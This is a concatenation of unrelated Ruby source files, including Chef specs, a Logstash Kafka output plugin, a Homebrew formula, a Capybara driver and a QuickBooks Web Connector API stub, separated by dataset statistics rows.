node.set['openstack']['db']['service_type'] = 'mariadb'
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3306/nova?charset=utf8'
expect(
subject.db_uri('compute', 'user', 'pass')
).to eq(expected)
end
%w(galera percona-cluster).each do |db|
it "returns compute db info hash when service found for #{db}" do
node.set['openstack']['db']['service_type'] = db
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3306/nova?charset=utf8'
expect(
subject.db_uri('compute', 'user', 'pass')
).to eq(expected)
end
end
it 'returns compute slave db info hash when service found for default mysql' do
node.set['openstack']['endpoints']['db']['enabled_slave'] = true
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3316/nova?charset=utf8'
expect(
subject.db_uri('compute', 'user', 'pass', true)
).to eq(expected)
end
it 'returns image slave db info hash when service found for mariadb' do
node.set['openstack']['db']['service_type'] = 'mariadb'
node.set['openstack']['endpoints']['db']['enabled_slave'] = true
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3316/glance?charset=utf8'
expect(
subject.db_uri('image', 'user', 'pass', true)
).to eq(expected)
end
%w(galera percona-cluster).each do |db|
it "returns network slave db info hash when service found for #{db}" do
node.set['openstack']['db']['service_type'] = db
node.set['openstack']['endpoints']['db']['enabled_slave'] = true
allow(subject).to receive(:node).and_return(chef_run.node)
expected = 'mysql+pymysql://user:[email protected]:3316/neutron?charset=utf8'
expect(
subject.db_uri('network', 'user', 'pass', true)
).to eq(expected)
end
end
end
end
end
| 38.623377 | 127 | 0.559292 |
e21894d37d87fed52e049d4f6a89d8f88443ae35 | 1,198 | require File.join(ENV.fetch('RAILS_ROOT'), 'config', 'environment')
# Graceful shutdown: SIGTERM flips the flag polled by the main loop below.
running = true
Signal.trap(:TERM) { running = false }
# Inspect one blockchain deposit and, when it has not been handled yet,
# enqueue a deposit_coin job for it. Errors are reported and swallowed so
# the surrounding polling loop keeps running.
def process_deposits(coin, channel, deposit)
  txid = deposit[:id]
  # Nothing to do when the transaction has already been recorded.
  return if PaymentTransaction::Normal.where(txid: txid).exists?
  # Ignore "zombie" transactions: every output address must belong to us.
  addresses = deposit[:entries].map { |entry| entry[:address] }
  known = addresses.all? do |address|
    PaymentAddress.where(currency: coin.code, address: address).exists?
  end
  return unless known
  Rails.logger.info "Missed #{coin.code.upcase} transaction: #{txid}."
  # Hand the transaction off to the deposit worker right away.
  AMQPQueue.enqueue :deposit_coin, { txid: txid, channel_key: channel.key }
rescue => e
  report_exception(e)
end
# Poll loop: each pass reloads the deposit channels and coin currencies,
# scans every coin's recent deposits for transactions we missed, then sleeps
# briefly. The loop exits when SIGTERM flips `running` (see trap above).
while running
  channels = DepositChannel.all.each_with_object({}) { |ch, memo| memo[ch.currency] = ch }
  coins = Currency.where(coin: true)
  coins.each do |coin|
    next unless (channel = channels[coin.code])
    processed = 0
    CoinAPI[coin.code.to_sym].each_deposit do |deposit|
      break unless running
      process_deposits(coin, channel, deposit)
      # Cap work per coin per pass so one busy chain cannot starve the others.
      break if (processed += 1) >= 100
    end
  end
  Kernel.sleep 5
end
| 30.717949 | 113 | 0.706177 |
ac923f64b5232595c7566e3708f0c3ca668e4240 | 467 | # frozen_string_literal: true
module Types
  # GraphQL enum exposing the container expiration policy cadence options.
  class ContainerExpirationPolicyCadenceEnum < BaseEnum
    # Maps the model's cadence option keys to GraphQL enum value names.
    OPTIONS_MAPPING = {
      '1d': 'EVERY_DAY',
      '7d': 'EVERY_WEEK',
      '14d': 'EVERY_TWO_WEEKS',
      '1month': 'EVERY_MONTH',
      '3month': 'EVERY_THREE_MONTHS'
    }.freeze

    # One enum value per model cadence option: the GraphQL name comes from
    # OPTIONS_MAPPING while the runtime value stays the raw option string
    # (e.g. '1d') that the model expects.
    ::ContainerExpirationPolicy.cadence_options.each do |option, description|
      value OPTIONS_MAPPING[option], description: description, value: option.to_s
    end
  end
end
| 25.944444 | 81 | 0.691649 |
e93eed3d741cbc9046a0979b6b00254184bc0505 | 646 | require 'test_helper'
module Regaliator
  module V15
    # Tests for the versioned (V15) API client facade.
    class ClientTest < Minitest::Test
      def setup
        @config = Configuration.new
        @subject = Client.new(@config)
      end

      def test_versioned_client_inherits_from_client
        assert_operator V15::Client, :<, Regaliator::Client
      end

      # Generate one accessor test per endpoint: client#account must return a
      # Regaliator::V15::Account, client#bill a Bill, and so on.
      %i(account bill biller rate transaction).each do |endpoint|
        define_method("test_#{endpoint}_method_returns_#{endpoint}_instance") do
          klass = "::Regaliator::V15::#{endpoint.capitalize}"
          assert_instance_of Kernel.const_get(klass), @subject.send(endpoint)
        end
      end
    end
  end
end
| 26.916667 | 80 | 0.664087 |
# Homebrew formula for slackcat, built from the release tarball with Go.
class Slackcat < Formula
  desc "Command-line utility for posting snippets to Slack"
  homepage "https://github.com/vektorlab/slackcat"
  url "https://github.com/bcicen/slackcat/archive/refs/tags/1.7.3.tar.gz"
  sha256 "2e3ed7ad5ab3075a8e80a6a0b08a8c52bb8e6e39f6ab03597f456278bfa7768b"
  license "MIT"
  # Pre-built bottles; regenerated by Homebrew CI — do not edit by hand.
  bottle do
    sha256 cellar: :any_skip_relocation, arm64_big_sur: "f765a9df06043f889342eb317e72648bc4904bea55d5339b69399b3a8b4ec3ff"
    sha256 cellar: :any_skip_relocation, big_sur:       "176aa3f2c1f088a0dce065034c8a6d381830679db2425c4b4d690823e0b1e022"
    sha256 cellar: :any_skip_relocation, catalina:      "344233ded56abb6b28a5b4cde44cc58713a63e7a2b49a84b8c47c0ebc9d2d3f6"
    sha256 cellar: :any_skip_relocation, mojave:        "0aa9e136f18f6937cf156f00b850c37361a2f4616ea52783e471ded9de82ee7f"
    sha256 cellar: :any_skip_relocation, x86_64_linux:  "96518aa5c2d2ddc1c62a1ee163748bc0909be294eebc290156a6ca1908d6216a"
  end
  depends_on "go" => :build
  def install
    # Strip symbols (-s -w) and stamp the release version into main.version.
    system "go", "build", *std_go_args(ldflags: "-s -w -X main.version=#{version}")
  end
  test do
    # `slackcat -v` prints the version; assert it matches the formula version.
    assert_match version.to_s, shell_output("#{bin}/slackcat -v")
  end
end
| 44.5 | 122 | 0.78911 |
1a711e0569a40d33a67e5baba55a4d0f4820743f | 1,019 | # coding: utf-8
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "omniauth/xero/version"
# Gem specification for omniauth-xero, an OmniAuth OAuth1 strategy for Xero.
Gem::Specification.new do |spec|
  spec.name          = "omniauth-xero"
  spec.version       = Omniauth::Xero::VERSION
  spec.authors       = ["Kale Worsley"]
  spec.email         = ["[email protected]"]
  spec.description   = "Xero authentication strategy for OmniAuth."
  spec.summary       = "Xero authentication strategy for OmniAuth."
  spec.homepage      = "http://github.com/kaleworsley/omniauth-xero"
  spec.license       = "MIT"

  # Package everything tracked by git; expose executables under bin/.
  spec.files         = `git ls-files`.split($/)
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.add_runtime_dependency "omniauth-oauth", "~> 1.0"

  spec.add_development_dependency "bundler", "~> 1.3"
  spec.add_development_dependency "rake"
  spec.add_development_dependency "rspec", "~> 3.0"
end
| 37.740741 | 74 | 0.667321 |
618a647d1c72b9a096e7c177111623237f918c4b | 19,616 | require 'logstash/namespace'
require 'logstash/outputs/base'
require 'java'
require 'logstash-integration-kafka_jars.rb'
require 'logstash/plugin_mixins/kafka_support'
# Write events to a Kafka topic. This uses the Kafka Producer API to write messages to a topic on
# the broker.
#
# Here's a compatibility matrix that shows the Kafka client versions that are compatible with each combination
# of Logstash and the Kafka output plugin:
#
# [options="header"]
# |==========================================================
# |Kafka Client Version |Logstash Version |Plugin Version |Why?
# |0.8 |2.0.0 - 2.x.x |<3.0.0 |Legacy, 0.8 is still popular
# |0.9 |2.0.0 - 2.3.x | 3.x.x |Works with the old Ruby Event API (`event['product']['price'] = 10`)
# |0.9 |2.4.x - 5.x.x | 4.x.x |Works with the new getter/setter APIs (`event.set('[product][price]', 10)`)
# |0.10.0.x |2.4.x - 5.x.x | 5.x.x |Not compatible with the <= 0.9 broker
# |0.10.1.x |2.4.x - 5.x.x | 6.x.x |
# |==========================================================
#
# NOTE: We recommended that you use matching Kafka client and broker versions. During upgrades, you should
# upgrade brokers before clients because brokers target backwards compatibility. For example, the 0.9 broker
# is compatible with both the 0.8 consumer and 0.9 consumer APIs, but not the other way around.
#
# This output supports connecting to Kafka over:
#
# * SSL (requires plugin version 3.0.0 or later)
# * Kerberos SASL (requires plugin version 5.1.0 or later)
#
# By default security is disabled but can be turned on as needed.
#
# The only required configuration is the topic_id. The default codec is plain,
# so events will be persisted on the broker in plain format. Logstash will encode your messages with not
# only the message but also with a timestamp and hostname. If you do not want anything but your message
# passing through, you should make the output configuration something like:
# [source,ruby]
# output {
# kafka {
# codec => plain {
# format => "%{message}"
# }
# topic_id => "mytopic"
# }
# }
# For more information see http://kafka.apache.org/documentation.html#theproducer
#
# Kafka producer configuration: http://kafka.apache.org/documentation.html#newproducerconfigs
class LogStash::Outputs::Kafka < LogStash::Outputs::Base
java_import org.apache.kafka.clients.producer.ProducerRecord
include LogStash::PluginMixins::KafkaSupport
declare_threadsafe!
config_name 'kafka'
default :codec, 'plain'
# The number of acknowledgments the producer requires the leader to have received
# before considering a request complete.
#
# acks=0, the producer will not wait for any acknowledgment from the server at all.
# acks=1, This will mean the leader will write the record to its local log but
# will respond without awaiting full acknowledgement from all followers.
# acks=all, This means the leader will wait for the full set of in-sync replicas to acknowledge the record.
config :acks, :validate => ["0", "1", "all"], :default => "1"
# The producer will attempt to batch records together into fewer requests whenever multiple
# records are being sent to the same partition. This helps performance on both the client
# and the server. This configuration controls the default batch size in bytes.
config :batch_size, :validate => :number, :default => 16_384 # Kafka default
# This is for bootstrapping and the producer will only use it for getting metadata (topics,
# partitions and replicas). The socket connections for sending the actual data will be
# established based on the broker information returned in the metadata. The format is
# `host1:port1,host2:port2`, and the list can be a subset of brokers or a VIP pointing to a
# subset of brokers.
config :bootstrap_servers, :validate => :string, :default => 'localhost:9092'
# The total bytes of memory the producer can use to buffer records waiting to be sent to the server.
config :buffer_memory, :validate => :number, :default => 33_554_432 # (32M) Kafka default
# The compression type for all data generated by the producer.
# The default is none (i.e. no compression). Valid values are none, gzip, snappy, lz4 or zstd.
config :compression_type, :validate => ["none", "gzip", "snappy", "lz4", "zstd"], :default => "none"
# How DNS lookups should be done. If set to `use_all_dns_ips`, when the lookup returns multiple
# IP addresses for a hostname, they will all be attempted to connect to before failing the
# connection. If the value is `resolve_canonical_bootstrap_servers_only` each entry will be
# resolved and expanded into a list of canonical names.
config :client_dns_lookup, :validate => ["default", "use_all_dns_ips", "resolve_canonical_bootstrap_servers_only"], :default => "use_all_dns_ips"
# The id string to pass to the server when making requests.
# The purpose of this is to be able to track the source of requests beyond just
# ip/port by allowing a logical application name to be included with the request
config :client_id, :validate => :string
# Serializer class for the key of the message
config :key_serializer, :validate => :string, :default => 'org.apache.kafka.common.serialization.StringSerializer'
# The producer groups together any records that arrive in between request
# transmissions into a single batched request. Normally this occurs only under
# load when records arrive faster than they can be sent out. However in some circumstances
# the client may want to reduce the number of requests even under moderate load.
# This setting accomplishes this by adding a small amount of artificial delay—that is,
# rather than immediately sending out a record the producer will wait for up to the given delay
# to allow other records to be sent so that the sends can be batched together.
config :linger_ms, :validate => :number, :default => 0 # Kafka default
# The maximum size of a request
config :max_request_size, :validate => :number, :default => 1_048_576 # (1MB) Kafka default
# The key for the message
config :message_key, :validate => :string
# the timeout setting for initial metadata request to fetch topic metadata.
config :metadata_fetch_timeout_ms, :validate => :number, :default => 60_000
# the max time in milliseconds before a metadata refresh is forced.
config :metadata_max_age_ms, :validate => :number, :default => 300_000 # (5m) Kafka default
# Partitioner to use - can be `default`, `uniform_sticky`, `round_robin` or a fully qualified class name of a custom partitioner.
config :partitioner, :validate => :string
# The size of the TCP receive buffer to use when reading data
config :receive_buffer_bytes, :validate => :number, :default => 32_768 # (32KB) Kafka default
# The amount of time to wait before attempting to reconnect to a given host when a connection fails.
config :reconnect_backoff_ms, :validate => :number, :default => 50 # Kafka default
# The configuration controls the maximum amount of time the client will wait
# for the response of a request. If the response is not received before the timeout
# elapses the client will resend the request if necessary or fail the request if
# retries are exhausted.
config :request_timeout_ms, :validate => :number, :default => 40_000 # (40s) Kafka default
# The default retry behavior is to retry until successful. To prevent data loss,
# the use of this setting is discouraged.
#
# If you choose to set `retries`, a value greater than zero will cause the
# client to only retry a fixed number of times. This will result in data loss
# if a transient error outlasts your retry count.
#
# A value less than zero is a configuration error.
config :retries, :validate => :number
# The amount of time to wait before attempting to retry a failed produce request to a given topic partition.
config :retry_backoff_ms, :validate => :number, :default => 100 # Kafka default
# The size of the TCP send buffer to use when sending data.
config :send_buffer_bytes, :validate => :number, :default => 131_072 # (128KB) Kafka default
# The truststore type.
config :ssl_truststore_type, :validate => :string
# The JKS truststore path to validate the Kafka broker's certificate.
config :ssl_truststore_location, :validate => :path
# The truststore password
config :ssl_truststore_password, :validate => :password
# The keystore type.
config :ssl_keystore_type, :validate => :string
# If client authentication is required, this setting stores the keystore path.
config :ssl_keystore_location, :validate => :path
# If client authentication is required, this setting stores the keystore password
config :ssl_keystore_password, :validate => :password
# The password of the private key in the key store file.
config :ssl_key_password, :validate => :password
# Algorithm to use when verifying host. Set to "" to disable
config :ssl_endpoint_identification_algorithm, :validate => :string, :default => 'https'
# Security protocol to use, which can be either of PLAINTEXT,SSL,SASL_PLAINTEXT,SASL_SSL
config :security_protocol, :validate => ["PLAINTEXT", "SSL", "SASL_PLAINTEXT", "SASL_SSL"], :default => "PLAINTEXT"
# http://kafka.apache.org/documentation.html#security_sasl[SASL mechanism] used for client connections.
# This may be any mechanism for which a security provider is available.
# GSSAPI is the default mechanism.
config :sasl_mechanism, :validate => :string, :default => "GSSAPI"
# The Kerberos principal name that Kafka broker runs as.
# This can be defined either in Kafka's JAAS config or in Kafka's config.
config :sasl_kerberos_service_name, :validate => :string
# The Java Authentication and Authorization Service (JAAS) API supplies user authentication and authorization
# services for Kafka. This setting provides the path to the JAAS file. Sample JAAS file for Kafka client:
# [source,java]
# ----------------------------------
# KafkaClient {
# com.sun.security.auth.module.Krb5LoginModule required
# useTicketCache=true
# renewTicket=true
# serviceName="kafka";
# };
# ----------------------------------
#
# Please note that specifying `jaas_path` and `kerberos_config` in the config file will add these
# to the global JVM system properties. This means if you have multiple Kafka inputs, all of them would be sharing the same
# `jaas_path` and `kerberos_config`. If this is not desirable, you would have to run separate instances of Logstash on
# different JVM instances.
config :jaas_path, :validate => :path
# JAAS configuration settings. This allows JAAS config to be a part of the plugin configuration and allows for different JAAS configuration per each plugin config.
config :sasl_jaas_config, :validate => :string
# Optional path to kerberos config file. This is krb5.conf style as detailed in https://web.mit.edu/kerberos/krb5-1.12/doc/admin/conf_files/krb5_conf.html
config :kerberos_config, :validate => :path
# The topic to produce messages to
config :topic_id, :validate => :string, :required => true
# Serializer class for the value of the message
config :value_serializer, :validate => :string, :default => 'org.apache.kafka.common.serialization.StringSerializer'
public
def register
@thread_batch_map = Concurrent::Hash.new
if [email protected]?
if @retries < 0
raise ConfigurationError, "A negative retry count (#{@retries}) is not valid. Must be a value >= 0"
end
logger.warn("Kafka output is configured with finite retry. This instructs Logstash to LOSE DATA after a set number of send attempts fails. If you do not want to lose data if Kafka is down, then you must remove the retry setting.", :retries => @retries)
end
@producer = create_producer
if value_serializer == 'org.apache.kafka.common.serialization.StringSerializer'
@codec.on_event do |event, data|
write_to_kafka(event, data)
end
elsif value_serializer == 'org.apache.kafka.common.serialization.ByteArraySerializer'
@codec.on_event do |event, data|
write_to_kafka(event, data.to_java_bytes)
end
else
raise ConfigurationError, "'value_serializer' only supports org.apache.kafka.common.serialization.ByteArraySerializer and org.apache.kafka.common.serialization.StringSerializer"
end
end
def prepare(record)
# This output is threadsafe, so we need to keep a batch per thread.
@thread_batch_map[Thread.current].add(record)
end
def multi_receive(events)
t = Thread.current
if !@thread_batch_map.include?(t)
@thread_batch_map[t] = java.util.ArrayList.new(events.size)
end
events.each do |event|
@codec.encode(event)
end
batch = @thread_batch_map[t]
if batch.any?
retrying_send(batch)
batch.clear
end
end
def retrying_send(batch)
remaining = @retries
while batch.any?
unless remaining.nil?
if remaining < 0
# TODO(sissel): Offer to DLQ? Then again, if it's a transient fault,
# DLQing would make things worse (you dlq data that would be successful
# after the fault is repaired)
logger.info("Exhausted user-configured retry count when sending to Kafka. Dropping these events.",
:max_retries => @retries, :drop_count => batch.count)
break
end
remaining -= 1
end
failures = []
futures = batch.collect do |record|
begin
# send() can throw an exception even before the future is created.
@producer.send(record)
rescue org.apache.kafka.common.errors.InterruptException,
org.apache.kafka.common.errors.RetriableException => e
logger.info("producer send failed, will retry sending", :exception => e.class, :message => e.message)
failures << record
nil
rescue org.apache.kafka.common.KafkaException => e
# This error is not retriable, drop event
# TODO: add DLQ support
logger.warn("producer send failed, dropping record",:exception => e.class, :message => e.message,
:record_value => record.value)
nil
end
end
futures.each_with_index do |future, i|
# We cannot skip nils using `futures.compact` because then our index `i` will not align with `batch`
unless future.nil?
begin
future.get
rescue java.util.concurrent.ExecutionException => e
# TODO(sissel): Add metric to count failures, possibly by exception type.
if e.get_cause.is_a? org.apache.kafka.common.errors.RetriableException or
e.get_cause.is_a? org.apache.kafka.common.errors.InterruptException
logger.info("producer send failed, will retry sending", :exception => e.cause.class,
:message => e.cause.message)
failures << batch[i]
elsif e.get_cause.is_a? org.apache.kafka.common.KafkaException
# This error is not retriable, drop event
# TODO: add DLQ support
logger.warn("producer send failed, dropping record", :exception => e.cause.class,
:message => e.cause.message, :record_value => batch[i].value)
end
end
end
end
# No failures? Cool. Let's move on.
break if failures.empty?
# Otherwise, retry with any failed transmissions
if remaining.nil? || remaining >= 0
delay = @retry_backoff_ms / 1000.0
logger.info("Sending batch to Kafka failed. Will retry after a delay.", :batch_size => batch.size,
:failures => failures.size,
:sleep => delay)
batch = failures
sleep(delay)
end
end
end
def close
@producer.close
end
private
def write_to_kafka(event, serialized_data)
if @message_key.nil?
record = ProducerRecord.new(event.sprintf(@topic_id), serialized_data)
else
record = ProducerRecord.new(event.sprintf(@topic_id), event.sprintf(@message_key), serialized_data)
end
prepare(record)
rescue LogStash::ShutdownSignal
logger.debug('producer received shutdown signal')
rescue => e
logger.warn('producer threw exception, restarting', :exception => e.class, :message => e.message)
end
def create_producer
begin
props = java.util.Properties.new
kafka = org.apache.kafka.clients.producer.ProducerConfig
props.put(kafka::ACKS_CONFIG, acks)
props.put(kafka::BATCH_SIZE_CONFIG, batch_size.to_s)
props.put(kafka::BOOTSTRAP_SERVERS_CONFIG, bootstrap_servers)
props.put(kafka::BUFFER_MEMORY_CONFIG, buffer_memory.to_s)
props.put(kafka::COMPRESSION_TYPE_CONFIG, compression_type)
props.put(kafka::CLIENT_DNS_LOOKUP_CONFIG, client_dns_lookup)
props.put(kafka::CLIENT_ID_CONFIG, client_id) unless client_id.nil?
props.put(kafka::KEY_SERIALIZER_CLASS_CONFIG, key_serializer)
props.put(kafka::LINGER_MS_CONFIG, linger_ms.to_s)
props.put(kafka::MAX_REQUEST_SIZE_CONFIG, max_request_size.to_s)
props.put(kafka::METADATA_MAX_AGE_CONFIG, metadata_max_age_ms.to_s) unless metadata_max_age_ms.nil?
unless partitioner.nil?
props.put(kafka::PARTITIONER_CLASS_CONFIG, partitioner = partitioner_class)
logger.debug('producer configured using partitioner', :partitioner_class => partitioner)
end
props.put(kafka::RECEIVE_BUFFER_CONFIG, receive_buffer_bytes.to_s) unless receive_buffer_bytes.nil?
props.put(kafka::RECONNECT_BACKOFF_MS_CONFIG, reconnect_backoff_ms.to_s) unless reconnect_backoff_ms.nil?
props.put(kafka::REQUEST_TIMEOUT_MS_CONFIG, request_timeout_ms.to_s) unless request_timeout_ms.nil?
props.put(kafka::RETRIES_CONFIG, retries.to_s) unless retries.nil?
props.put(kafka::RETRY_BACKOFF_MS_CONFIG, retry_backoff_ms.to_s)
props.put(kafka::SEND_BUFFER_CONFIG, send_buffer_bytes.to_s)
props.put(kafka::VALUE_SERIALIZER_CLASS_CONFIG, value_serializer)
props.put("security.protocol", security_protocol) unless security_protocol.nil?
if security_protocol == "SSL"
set_trustore_keystore_config(props)
elsif security_protocol == "SASL_PLAINTEXT"
set_sasl_config(props)
elsif security_protocol == "SASL_SSL"
set_trustore_keystore_config(props)
set_sasl_config(props)
end
org.apache.kafka.clients.producer.KafkaProducer.new(props)
rescue => e
logger.error("Unable to create Kafka producer from given configuration",
:kafka_error_message => e,
:cause => e.respond_to?(:getCause) ? e.getCause() : nil)
raise e
end
end
def partitioner_class
case partitioner
when 'round_robin'
'org.apache.kafka.clients.producer.RoundRobinPartitioner'
when 'uniform_sticky'
'org.apache.kafka.clients.producer.UniformStickyPartitioner'
when 'default'
'org.apache.kafka.clients.producer.internals.DefaultPartitioner'
else
unless partitioner.index('.')
raise LogStash::ConfigurationError, "unsupported partitioner: #{partitioner.inspect}"
end
partitioner # assume a fully qualified class-name
end
end
end #class LogStash::Outputs::Kafka
| 49.660759 | 258 | 0.699429 |
b9dbf512e1b9c6bdbc679effaae57e96ac3a77c2 | 325 | require File.join(File.dirname(__FILE__), '..', 'spec_helper')
# Specs for the machine's math:tan stack operation.
describe "math:tan" do
  it "is implemented" do
    Machine.new.should respond_to(:tan)
  end

  # :tan pops exactly one operand: an empty stack underflows, while a single
  # padding value (nil) on the stack is sufficient to avoid underflow.
  it "requires one operand" do
    lambda { Machine.run([:tan]) }.should underflow_stack
    lambda { Machine.run([nil, :tan]) }.should_not underflow_stack
  end
end
| 25 | 66 | 0.695385 |
03b46c5bf3b992ed98a58f4924e9bdd4233b72d4 | 1,145 | require 'chef_helper'
RSpec.describe Registry do
  before do
    allow(Gitlab).to receive(:[]).and_call_original
  end

  # Each scenario stubs a gitlab.rb configuration under which the registry
  # must NOT be auto-enabled; the expectation is identical for all of them.
  {
    'registry is disabled' => { registry: { enabled: false } },
    'registry_external_url is set' => { registry_external_url: 'https://registry.example.com' },
    'lets encrypt is not enabled' => { letsencrypt: { enable: false } },
    'external_url is a relative url' => { external_url: 'https://registry.example.com/path' }
  }.each do |description, settings|
    context description do
      before do
        stub_gitlab_rb(settings)
      end

      it 'should return false' do
        expect(described_class.auto_enable).to be_falsey
      end
    end
  end
end
| 19.083333 | 61 | 0.634061 |
1d493f56859972b099cf8c6678dd5da9f8e02a74 | 2,157 | # frozen_string_literal: true
require "uri"
require "cgi"
require "net/http"
require "capybara"
require "capybara/jsdom/version"
require "capybara/jsdom/node"
require "capybara/jsdom/browser"
module Capybara
module Jsdom
# Capybara driver using JSDom lightweight fast DOM implementation.
class Driver < Capybara::Driver::Base
attr_writer :session
attr_accessor :browser
attr_reader :status_code
def initialize(app, options = {})
@app = app
@options = options.dup
@browser = options[:browser] || Browser.new(@options)
end
def current_url
browser.current_url
end
def visit(url)
browser.load url
end
def refresh
visit current_url
end
def html
browser.html
end
def find_css(query)
nodes = browser.find_css query
nodes.map { |n| Node.new(self, n, browser) }
end
def find_xpath(query)
nodes = browser.find_xpath query
nodes.map { |n| Node.new(self, n, browser) }
end
def go_back
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#go_back"
end
def go_forward
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#go_forward"
end
def execute_script(script, *args)
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#execute_script"
end
def evaluate_script(script, *args)
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#evaluate_script"
end
def evaluate_async_script(script, *args)
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#evaluate_script_asnyc"
end
def save_screenshot(path, options={})
raise Capybara::NotSupportedByDriverError, "Capybara::Driver::Base#save_screenshot"
end
def response_headers
@response
end
# Default methods
def invalid_element_errors
[]
end
def wait?
true
end
def reset!; end
def needs_server?
true
end
end
end
end
| 22.010204 | 97 | 0.637459 |
21e42471028860849c76896f1b786297aca983cd | 2,393 | module ActiveScaffold::Config
class FieldSearch < Base
self.crud_type = :read
def initialize(core_config)
@core = core_config
@text_search = self.class.text_search
# start with the ActionLink defined globally
@link = self.class.link.clone
end
# global level configuration
# --------------------------
# the ActionLink for this action
cattr_reader :link
@@link = ActiveScaffold::DataStructures::ActionLink.new('show_search', :label => :search, :type => :collection, :security_method => :search_authorized?)
def self.full_text_search=(value)
::ActiveSupport::Deprecation.warn("full_text_search is deprecated, use text_search = :full instead", caller)
@@text_search = :full
end
def self.full_text_search?
::ActiveSupport::Deprecation.warn("full_text_search? is deprecated, use text_search == :full instead", caller)
@@text_search == :full
end
# A flag for how the search should do full-text searching in the database:
# * :full: LIKE %?%
# * :start: LIKE ?%
# * :end: LIKE %?
# * false: LIKE ?
# Default is :full
cattr_accessor :text_search
@@text_search = :full
# instance-level configuration
# ----------------------------
# provides access to the list of columns specifically meant for the Search to use
def columns
# we want to delay initializing to the @core.columns set for as long as possible. Too soon and .search_sql will not be available to .searchable?
unless @columns
self.columns = @core.columns._inheritable
self.columns.exclude @core.columns.active_record_class.locking_column.to_sym
end
@columns
end
public :columns=
# A flag for how the search should do full-text searching in the database:
# * :full: LIKE %?%
# * :start: LIKE ?%
# * :end: LIKE %?
# * false: LIKE ?
# Default is :full
attr_accessor :text_search
def full_text_search=(value)
::ActiveSupport::Deprecation.warn("full_text_search is deprecated, use text_search = :full instead", caller)
@text_search = :full
end
def full_text_search?
::ActiveSupport::Deprecation.warn("full_text_search? is deprecated, use text_search == :full instead", caller)
@text_search == :full
end
# the ActionLink for this action
attr_accessor :link
end
end
| 32.780822 | 156 | 0.653991 |
5dbc183ff88801ee0b6b0f659240eedbc0d49c3b | 384 | require 'medusa'
begin
  # make sure that the first option is a URL we can crawl
  url = URI(ARGV[0])
rescue
  # Bare rescue catches StandardError (e.g. URI::InvalidURIError, or the
  # TypeError raised by URI(nil) when no argument was given): print usage
  # and exit successfully.
  puts <<-INFO
Usage:
  medusa count <url>

Synopsis:
  Crawls a site starting at the given URL and outputs the total number
  of unique pages on the site.
INFO
  exit(0)
end
# Crawl the whole site and report how many unique pages were found.
Medusa.crawl(url) do |medusa|
  medusa.after_crawl do |pages|
    # Array#uniq! returns nil when it removes nothing, which would crash
    # on .size; the non-destructive #uniq always returns an array.
    puts pages.uniq.size
  end
end
| 16.695652 | 70 | 0.705729 |
627b0b939c79f3e73ccad422a01704968ec6c410 | 1,047 | require 'test_helper'
# Integration tests for the users CRUD endpoints, exercised as an admin.
class UsersControllerTest < ActionDispatch::IntegrationTest
  include Devise::Test::IntegrationHelpers

  setup do
    sign_in users(:admin)
    @user = users(:admin)
  end

  test "should get index" do
    get users_url
    assert_response :success
  end

  test "should get new" do
    get new_user_url
    assert_response :success
  end

  test "should show user" do
    # Show must hit the member route (user_url), not the collection
    # (users_url, which is the index) as before.
    get user_url('en', @user)
    assert_response :success
  end

  test "should get edit" do
    get edit_user_url('en',@user)
    assert_response :success
  end

  test "should update user" do
    patch user_url('en',@user), params: { user: {
      first_name: 'Admin',
      last_name: '',
      email: '[email protected]',
      is_active: true,
      # fixed key typo: was `passowrd`, which the model would ignore
      password: 'password',
      user_types: :manager
    } }
    assert_redirected_to users_url
  end

  test "should destroy user" do
    assert_difference('User.count', -1) do
      delete user_url('en',@user)
    end

    assert_redirected_to users_url
  end
end
4a48fb8e6fd8a93d012b48046bc8ff6bdbbe7a32 | 4,196 | class QbwcApi < ActionWebService::API::Base
  # Keep SOAP method names exactly as declared (QBWC expects camelCase).
  inflect_names false

  # --- [ QBWC server version control ] ---
  # Expects:
  # * string ticket = A GUID based ticket string to maintain identity of QBWebConnector
  # Returns string:
  # * Return a string describing the server version and any other information that you want your user to see.
  api_method :serverVersion,
    :expects => [{:ticket => :string}],
    :returns => [:string]

  # --- [ QBWC version control ] ---
  # Expects:
  # * string strVersion = QBWC version number
  # Returns string:
  # * NULL or <emptyString> = QBWC will let the web service update
  # * "E:<any text>" = popup ERROR dialog with <any text>, abort update and force download of new QBWC.
  # * "W:<any text>" = popup WARNING dialog with <any text>, and give user choice to update or not.
  #
  # NOTE(review): the QBWC spec describes clientVersion as returning a single
  # string, but this declares a string *array* ([[:string]], like
  # authenticate) — confirm against the WSDL that this is intentional.
  api_method :clientVersion,
    :expects => [{:strVersion => :string}],
    :returns => [[:string]]

  # --- [ Authenticate web connector ] ---
  # Expects:
  # * string strUserName = username from QWC file
  # * string strPassword = password
  # Returns string[2]:
  # * string[0] = ticket (guid)
  # * string[1] =
  #    - empty string = use current company file
  #    - "none" = no further request/no further action required
  #    - "nvu" = not valid user
  #    - any other string value = use this company file
  api_method :authenticate,
    :expects => [{:strUserName => :string}, {:strPassword => :string}],
    :returns => [[:string]]

  # --- [ To facilitate capturing of QuickBooks error and notifying it to web services ] ---
  # Expects:
  # * string ticket = A GUID based ticket string to maintain identity of QBWebConnector
  # * string hresult = An HRESULT value thrown by QuickBooks when trying to make connection
  # * string message = An error message corresponding to the HRESULT
  # Returns string:
  # * "done" = no further action required from QBWebConnector
  # * any other string value = use this name for company file
  api_method :connectionError,
    :expects => [{:ticket => :string}, {:hresult => :string}, {:message => :string}],
    :returns => [:string]

  # --- [ Facilitates web service to send request XML to QuickBooks via QBWC ] ---
  # Expects:
  # * string ticket
  # * string strHCPResponse
  # * string strCompanyFileName
  # * string Country
  # * int qbXMLMajorVers
  # * int qbXMLMinorVers
  # Returns string:
  # * "any_string" = Request XML for QBWebConnector to process
